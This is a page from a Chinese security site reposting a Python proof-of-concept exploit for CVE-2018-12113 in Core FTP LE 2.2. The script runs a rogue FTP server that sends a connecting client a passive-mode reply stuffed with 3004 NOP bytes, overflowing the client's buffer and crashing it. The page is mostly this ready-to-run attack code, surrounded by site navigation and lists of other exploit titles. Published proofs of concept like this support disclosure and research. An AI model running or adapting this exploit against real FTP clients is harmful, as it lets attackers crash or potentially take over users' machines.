首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Core FTP LE 2.2 - Buffer Overflow (PoC)
来源:vfocus.net 作者:Göksel 发布时间:2018-07-03  

# Exploit Title: Core FTP LE 2.2 - Buffer Overflow (PoC)
# Date: 2018-06-28
# Exploit Author: Berk Cem Göksel
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download
# Version:  Core FTP Client LE v2.2 Build 1921
# Tested on: Windows 10
# Category: Dos
# CVE : CVE-2018-12113
# coding: utf-8

# Description:]
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.

#!/usr/bin/env python

import socket

IP = '0.0.0.0'
port = 21


Stack_beginning = 3004

buff = "\x90" * (3004)

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((IP, port))
        s.listen(20)
        print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")

while True:
    conn, addr = s.accept()
    conn.send('220 Welcome!' + '\r\n')
    print conn.recv(1024)
    conn.send('331 OK.\r\n')
    print conn.recv(1024)
    conn.send('230 OK.\r\n')
    print conn.recv(1024)
    conn.send('215 UNIX Type: L8\r\n')
    print conn.recv(1024)
    conn.send('257 "/" is current directory.\r\n')
    print conn.recv(1024)
    conn.send('227 Entering Passive Mode (' + buff +  ')\r\n')
    print conn.recv(1024)
    conn.send('257' + '\r\n')


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Geutebruck 5.02024 G-Cam/EFD-2
·VMware NSX SD-WAN Edge < 3.1.2
·Cisco Adaptive Security Applia
·Enhanced Mitigation Experience
·Polaris Office 2017 8.1 Remote
·SIPp 3.6 - Local Buffer Overfl
·Microsoft Internet Explorer HT
·FTPShell Client 6.70 (Enterpri
·Quest KACE Systems Management
·Nagios XI 5.2.6-5.4.12 - Chain
·KVM (Nested Virtualization) -
·Delta Industrial Automation CO
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved